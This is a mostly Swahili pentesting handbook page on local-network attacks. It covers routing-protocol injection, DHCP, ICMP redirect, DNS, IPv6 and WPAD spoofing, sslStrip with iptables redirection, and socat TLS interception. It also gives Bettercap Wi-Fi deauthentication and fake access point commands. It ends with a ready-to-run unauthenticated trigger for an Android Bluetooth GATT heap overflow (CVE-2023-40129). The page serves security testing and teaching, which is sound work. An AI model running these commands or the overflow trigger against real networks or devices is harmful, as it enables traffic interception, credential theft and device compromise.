Three versions of the Routing Information Protocol (RIP) are known to exist: RIP, RIPv2, and RIPng. RIP na RIPv2 hutuma datagrama kwa wenzake kupitia port 520 kwa kutumia UDP, wakati RIPng hutangaza datagrama kwa UDP port 521 kupitia IPv6 multicast. RIPv2 iliingiza msaada wa uthibitisho wa MD5. Kwa upande mwingine, RIPng haina uthibitisho wa asili; badala yake inategemea vichwa vya hiari vya IPsec AH na ESP ndani ya IPv6.

• RIP and RIPv2: Mawasiliano hufanywa kupitia datagrama za UDP kwenye port 520.
• RIPng: Inatumia UDP port 521 kwa kutangaza datagrama kupitia IPv6 multicast.

Kumbuka kuwa RIPv2 inaunga mkono uthibitisho wa MD5 wakati RIPng haitoi uthibitisho wa asili, ikitegemea vichwa vya IPsec AH na ESP katika IPv6.

EIGRP Attacks

EIGRP (Enhanced Interior Gateway Routing Protocol) ni itifaki ya routing ya dynamic. Ni itifaki ya distance-vector. Ikiwa hakuna uthibitisho na usanidi wa interfaces za passive, mdukuzi anaweza kuingilia routing ya EIGRP na kusababisha routing tables poisoning. Zaidi ya hayo, mtandao wa EIGRP (kwa maneno mengine, autonomous system) ni bapa na hauna segmentation katika maeneo yoyote. Ikiwa mshambuliaji ataingiza route, inawezekana route hii itaenea katika mfumo wa autonomous EIGRP.

Kushambulia mfumo wa EIGRP kunahitaji kuanzisha neighborship na router halali ya EIGRP, jambo ambalo linafungua fursa nyingi, kutoka uchunguzi wa msingi hadi aina mbalimbali za kuingiza.

FRRouting inakuwezesha kutekeleza virtual router ambayo inaunga mkono BGP, OSPF, EIGRP, RIP na itifaki nyingine. Unachohitaji kufanya ni kuiendesha kwenye mfumo wa mshambuliaji wako na unaweza kujionyesha kama router halali katika domain ya routing.

EIGRP Attacks

Coly ina uwezo wa kukamata broadcasts za EIGRP (Enhanced Interior Gateway Routing Protocol). Pia inaruhusu kuingiza pakiti, ambazo zinaweza kutumika kubadilisha mipangilio ya routing.

OSPF

Katika Open Shortest Path First (OSPF) itifaki, uthibitisho wa MD5 mara nyingi hutumika kuhakikisha mawasiliano salama kati ya routers. Hata hivyo, kipimo hiki cha usalama kinaweza kuathiriwa kwa kutumia zana kama Loki na John the Ripper. Zana hizi zina uwezo wa kukamata na kuvunja MD5 hashes, kuonyesha ufunguo wa uthibitisho. Mara ufunguo huu unapopatikana, unaweza kutumika kuingiza taarifa mpya za routing. Ili kusanidi vigezo vya route na kuweka ufunguo ulioathiriwa, tabo za Injection na Connection zinatumika, mtawalia.

• Capturing and Cracking MD5 Hashes: Zana kama Loki na John the Ripper zimetumika kwa madhumuni haya.
• Configuring Route Parameters: Hufanywa kupitia taba ya Injection.
• Setting the Compromised Key: Ufunguo unasanidiwa chini ya taba ya Connection.

Other Generic Tools & Sources

• Above: Zana ya kuchambua trafiki ya mtandao na kupata udhaifu
• Unaweza kupata baadhi ya maelezo zaidi kuhusu mashambulio ya mtandao hapa.

Spoofing

Mshambuliaji anasanidi parameta zote za mtandao (GW, IP, DNS) za mwanachama mpya wa mtandao kwa kutuma majibu ya DHCP ya uongo.

Ettercap
yersinia dhcp -attack 2 #More parameters are needed

ARP Spoofing

Angalia previous section.

ICMPRedirect

ICMP Redirect inahusisha kutuma ICMP packet type 1 code 5 inayonyesha kwamba attacker ndiye njia bora ya kufikia IP. Kisha, wakati victim anataka kuwasiliana na IP, itatuma packet kupitia attacker.

Ettercap
icmp_redirect
hping3 [VICTIM IP ADDRESS] -C 5 -K 1 -a [VICTIM DEFAULT GW IP ADDRESS] --icmp-gw [ATTACKER IP ADDRESS] --icmp-ipdst [DST IP ADDRESS] --icmp-ipsrc [VICTIM IP ADDRESS] #Send icmp to [1] form [2], route to [3] packets sent to [4] from [5]

DNS Spoofing

Mshambuliaji atatatua baadhi (au yote) ya domains ambazo mwathirika anaziomba.

set dns.spoof.hosts ./dns.spoof.hosts; dns.spoof on

Sanidi DNS yako mwenyewe kwa dnsmasq

apt-get install dnsmasq
echo "addn-hosts=dnsmasq.hosts" > dnsmasq.conf
echo "127.0.0.1   domain.example.com" > dnsmasq.hosts
sudo dnsmasq -C dnsmasq.conf --no-daemon
dig @localhost domain.example.com # Test the configured DNS

Milango za ndani

Mara nyingi kuna njia nyingi za kufikia mifumo na mitandao. Baada ya kujenga orodha ya anwani za MAC ndani ya mtandao wa ndani, tumia gateway-finder.py kubaini hosts zinazounga mkono IPv4 forwarding.

root@kali:~# git clone https://github.com/pentestmonkey/gateway-finder.git
root@kali:~# cd gateway-finder/
root@kali:~# arp-scan -l | tee hosts.txt
Interface: eth0, datalink type: EN10MB (Ethernet)
Starting arp-scan 1.6 with 256 hosts (http://www.nta-monitor.com/tools/arp-scan/)
10.0.0.100     00:13:72:09:ad:76       Dell Inc.
10.0.0.200     00:90:27:43:c0:57       INTEL CORPORATION
10.0.0.254     00:08:74:c0:40:ce       Dell Computer Corp.

root@kali:~/gateway-finder# ./gateway-finder.py -f hosts.txt -i 209.85.227.99
gateway-finder v1.0 http://pentestmonkey.net/tools/gateway-finder
[+] Using interface eth0 (-I to change)
[+] Found 3 MAC addresses in hosts.txt
[+] We can ping 209.85.227.99 via 00:13:72:09:AD:76 [10.0.0.100]
[+] We can reach TCP port 80 on 209.85.227.99 via 00:13:72:09:AD:76 [10.0.0.100]

Spoofing LLMNR, NBT-NS, and mDNS

Kwa utatuzi wa host wa ndani pale ambapo DNS lookups hazifanikiwi, mifumo ya Microsoft inategemea Link-Local Multicast Name Resolution (LLMNR) na NetBIOS Name Service (NBT-NS). Vivyo hivyo, utekelezaji wa Apple Bonjour na Linux zero-configuration hutumia Multicast DNS (mDNS) kugundua mifumo ndani ya mtandao. Kutokana na kuwa itifaki hizi hazijathibitishwa na jinsi zinavyofanya kazi kwa UDP kwa upitishaji wa ujumbe, zinaweza kutumiwa na washambuliaji kujaribu kuhamisha watumiaji kwenda kwa huduma zenye madhara.

Unaweza kujifanya huduma zinazotafutwa na hosts kwa kutumia Responder kutuma majibu bandia.
Soma hapa habari zaidi kuhusu how to Impersonate services with Responder.

Spoofing WPAD

Vikibrawuza mara nyingi hutumia itifaki ya Web Proxy Auto-Discovery (WPAD) ili kupata kwa moja kwa moja mipangilio ya proxy. Hii inahusisha kupata maelezo ya usanidi kutoka kwa server, hasa kupitia URL kama "http://wpad.example.org/wpad.dat". Ugunduzi wa server hii na clients unaweza kutokea kwa njia mbalimbali:

• Kupitia DHCP, ambapo ugunduzi unafanyika kwa kutumia kiingilio maalum cha code 252.
• Kwa DNS, ambayo inahusisha kutafuta hostname iliyofunguliwa wpad ndani ya domain ya ndani.
• Kupitia Microsoft LLMNR and NBT-NS, ambazo ni mechanisms za fallback zinazotumika pale ambapo DNS lookups hazifanikiwi.

Zana Responder inachukua faida ya itifaki hii kwa kuchukua jukumu la malicious WPAD server. Inatumia DHCP, DNS, LLMNR, na NBT-NS kuwachanganya clients ili waungane nayo. Ili kuchunguza kwa undani jinsi huduma zinavyoweza kujiliiga kwa kutumia Responder check this.

Spoofing SSDP and UPnP devices

Unaweza kutoa huduma tofauti kwenye mtandao ili kujaribu kudanganya mtumiaji kuingiza nenosiri kwa maandishi wazi. Taarifa zaidi kuhusu shambulio hili kwenye Spoofing SSDP and UPnP Devices.

IPv6 Neighbor Spoofing

Shambulio hili ni sawa sana na ARP Spoofing lakini katika ulimwengu wa IPv6. Unaweza kumfanya mhanga aamini kwamba IPv6 ya GW ina MAC ya mshambuliaji.

sudo parasite6 -l eth0 # This option will respond to every requests spoofing the address that was requested
sudo fake_advertise6 -r -w 2 eth0 <Router_IPv6> #This option will send the Neighbor Advertisement packet every 2 seconds

IPv6 Router Advertisement Spoofing/Flooding

Baadhi ya OS zinaweka kwa chaguo-msingi gateway kutoka kwa vifurushi vya RA vinavyotumwa kwenye mtandao. Ili kutangaza attacker kama IPv6 router unaweza kutumia:

sysctl -w net.ipv6.conf.all.forwarding=1 4
ip route add default via <ROUTER_IPv6> dev wlan0
fake_router6 wlan0 fe80::01/16

IPv6 DHCP spoofing

Kwa chaguo-msingi, baadhi ya OS hujaribu kusanidi DNS kwa kusoma paketi ya DHCPv6 kwenye mtandao. Kisha, mshambuliaji anaweza kutuma paketi ya DHCPv6 kujifanya kuwa DNS. DHCP pia humpatia mhanga anwani ya IPv6.

dhcp6.spoof on
dhcp6.spoof.domains <list of domains>

mitm6

HTTP (ukurasa bandia na JS code injection)

Mashambulio ya Internet

sslStrip

Kwa kifupi, shambulio hili linachofanya ni, endapo user atajaribu access ukurasa wa HTTP unao redirecting kwa toleo la HTTPS. sslStrip itahifadhi HTTP connection with client and HTTPS connection with server, hivyo itakuwa na uwezo wa sniff muunganisho kwa plain text.

apt-get install sslstrip
sslstrip -w /tmp/sslstrip.log --all - l 10000 -f -k
#iptables --flush
#iptables --flush -t nat
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
iptables -A INPUT -p tcp --destination-port 10000 -j ACCEPT

Taarifa zaidi here.

sslStrip+ and dns2proxy kwa kuepuka HSTS

The difference between sslStrip+ and dns2proxy against sslStrip is that they will redirect for example www.facebook.com to wwww.facebook.com (note the extra "w") and will set the address of this domain as the attacker IP. This way, the client will connect to wwww.facebook.com (the attacker) but behind the scenes sslstrip+ will maintain the real connection via https with www.facebook.com.

The goal of this technique is to avoid HSTS because wwww.facebook.com won't be saved in the cache of the browser, so the browser will be tricked to perform facebook authentication in HTTP.
Note that in order to perform this attack the victim has to try to access initially to http://www.faceook.com and not https. This can be done modifying the links inside an http page.

Taarifa zaidi here, here and here.

sslStrip or sslStrip+ doesn't work anymore. This is because there are HSTS rules presaved in the browsers, so even if it's the first time that a user access an "important" domain he will access it via HTTPS. Also, notice that the presaved rules and other generated rules can use the flag includeSubdomains so the wwww.facebook.com example from before won't work anymore as facebook.com uses HSTS with includeSubdomains.

TODO: easy-creds, evilgrade, metasploit, factory

Kusikiliza TCP kwenye port

sudo nc -l -p 80
socat TCP4-LISTEN:80,fork,reuseaddr -

TCP + SSL kusikiliza kwenye port

Tengeneza funguo na cheti kilichojisainiwa mwenyewe

FILENAME=server
# Generate a public/private key pair:
openssl genrsa -out $FILENAME.key 1024
# Generate a self signed certificate:
openssl req -new -key $FILENAME.key -x509 -sha256 -days 3653 -out $FILENAME.crt
# Generate the PEM file by just appending the key and certificate files:
cat $FILENAME.key $FILENAME.crt >$FILENAME.pem

Sikiliza kwa kutumia cheti

sudo socat -v -v openssl-listen:443,reuseaddr,fork,cert=$FILENAME.pem,cafile=$FILENAME.crt,verify=0 -

Sikiliza ukitumia cheti na uelekeze kwa mashine za mwenyeji

sudo socat -v -v openssl-listen:443,reuseaddr,fork,cert=$FILENAME.pem,cafile=$FILENAME.crt,verify=0  openssl-connect:[SERVER]:[PORT],verify=0

Wakati mwingine, ikiwa the client anahakiki kwamba the CA ni valid, unaweza serve a certificate of other hostname signed by a CA.
Jaribio lingine la kuvutia ni serve a certificate of the requested hostname but self-signed.

Mambo mengine ya kujaribu ni kujaribu kusaini certificate na certificate halali ambayo si CA halali. Au kutumia valid public key, kulazimisha kutumia algorithm kama diffie hellman (ile ambayo haitaji ku-decrypt chochote kwa private key halisi) na wakati client inapoomba probe ya private key halisi (kama hash) tuma probe bandia na kutegemea kwamba client haitaangalia hii.

Bettercap

# Events
events.stream off #Stop showing events
events.show #Show all events
events.show 5 #Show latests 5 events
events.clear

# Ticker (loop of commands)
set ticker.period 5; set ticker.commands "wifi.deauth DE:AD:BE:EF:DE:AD"; ticker on

# Caplets
caplets.show
caplets.update

# Wifi
wifi.recon on
wifi.deauth BSSID
wifi.show
# Fake wifi
set wifi.ap.ssid Banana
set wifi.ap.bssid DE:AD:BE:EF:DE:AD
set wifi.ap.channel 5
set wifi.ap.encryption false #If true, WPA2
wifi.recon on; wifi.ap

Vidokezo vya Active Discovery

Kumbuka kwamba wakati UDP packet inapotumwa kwa kifaa ambacho hakina port iliyohitajika, ICMP (Port Unreachable) inatumwa.

ARP discover

ARP packets zimetumika kugundua IPs zinazotumika ndani ya network. PC inapaswa kutuma request kwa kila possible IP address na ni zile tu zinazotumika zitajibu.

mDNS (multicast DNS)

Bettercap inatuma MDNS request (kila X ms) ikiuliza kwa _services_.dns-sd._udp.local. Mashine inayoiwona packet kawaida hujibu request hii. Kisha, inatafuta tu mashine zinazojibu "services".

Zana

• Avahi-browser (--all)
• Bettercap (net.probe.mdns)
• Responder

NBNS (NetBios Name Server)

Bettercap inatuma broadcast packets kwa port 137/UDP ikiuliza jina "CKAAAAAAAAAAAAAAAAAAAAAAAAAAA".

SSDP (Simple Service Discovery Protocol)

Bettercap inatuma broadcast SSDP packets kutafuta aina zote za services (UDP Port 1900).

WSD (Web Service Discovery)

Bettercap inatuma broadcast WSD packets kutafuta services (UDP Port 3702).

Mashambulizi ya Bluetooth (L2CAP/ATT/GATT)

• Android Fluoride inafunua services juu ya L2CAP PSMs (e.g., SDP 0x0001, RFCOMM 0x0003, BNEP 0x000F, AVCTP 0x0017/0x001B, AVDTP 0x0019, ATT/GATT 0x001F). Services zinajisajili kupitia:

uint16_t L2CA_Register2(uint16_t psm, const tL2CAP_APPL_INFO& p_cb_info,
bool enable_snoop, tL2CAP_ERTM_INFO* p_ertm_info,
uint16_t my_mtu, uint16_t required_remote_mtu,
uint16_t sec_level);

• BlueBlue framework inawezesha utengenezaji wa L2CAP/ATT kwa kutumia Scapy (imejengwa juu ya BlueBorne l2cap_infra). Mfano:

acl  = ACLConnection(src_bdaddr, dst_bdaddr, auth_mode='justworks')
gatt = acl.l2cap_connect(psm=PSM_ATT, mtu=672)
gatt.send_frag(p8(GATT_READ)+p16(1234))
print(gatt.recv())

• CVE-2023-40129 (Fluoride GATT): upungufu wa integer katika mjenzi wa majibu wa Read Multiple Variable unaweza kusababisha heap overflow ya takriban ~64KB wakati MTU inakatiza kipengele lenye urefu kinachobadilika lakini uwanja wa urefu wa +2 hauzingatiwi.

static void build_read_multi_rsp(tGATT_SR_CMD* p_cmd, uint16_t mtu) {
uint16_t ii, total_len, len; uint8_t* p; bool is_overflow=false;
len = sizeof(BT_HDR) + L2CAP_MIN_OFFSET + mtu;
BT_HDR* p_buf = (BT_HDR*)osi_calloc(len); p_buf->offset=L2CAP_MIN_OFFSET;
p = (uint8_t*)(p_buf + 1) + p_buf->offset; *p++ = GATT_RSP_READ_MULTI_VAR;
p_buf->len=1;
for (ii=0; ii<p_cmd->multi_req.num_handles; ii++) {
tGATTS_RSP* p_rsp = ...; // dequeued
if (p_rsp) {
total_len = (p_buf->len + p_rsp->attr_value.len);
if (p_cmd->multi_req.variable_len) total_len += 2;
if (total_len > mtu) {
len = p_rsp->attr_value.len - (total_len - mtu); // BUG: ignores +2
is_overflow = true;
} else { len = p_rsp->attr_value.len; }
if (p_cmd->multi_req.variable_len) { UINT16_TO_STREAM(p, len); p_buf->len += 2; }
memcpy(p, p_rsp->attr_value.value, len); // heap overflow
if (!is_overflow) p += len; p_buf->len += len; if (is_overflow) break;
}
}
}

• Minimal unauthenticated trigger (MTU ndogo inalazimisha underflow kwenye attribute ya 4):

# GATT_REQ_READ_MULTI_VAR (0x20), MTU=55
acl  = ACLConnection(interface, bdaddr)
gatt = acl.l2cap_connect(psm=PSM_ATT, mtu=55)
pkt  = b'\x20'  # opcode
pkt += p16(9); pkt += p16(9); pkt += p16(9); pkt += p16(9)
gatt.send(pkt)
# On 4th insert: p_buf->len=55 (1 + 3*(16+2)), total_len=73 -> len=16-(73-55)=-2 -> ~64KB overwrite

Telekomu / Mobile-Core (GTP) Exploitation

Telecom Network Exploitation

Marejeo

• https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9
• Network Security Assessment: Know Your Network (3rd edition)
• Practical IoT Hacking: The Definitive Guide to Attacking the Internet of Things. By Fotios Chantzis, Ioannis Stais, Paulino Calderon, Evangelos Deirmentzoglou, Beau Wood
• https://medium.com/@cursedpkt/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9
• Paint it blue: Attacking the bluetooth stack (Synacktiv)
• BlueBorne L2CAP testing infra (l2cap_infra)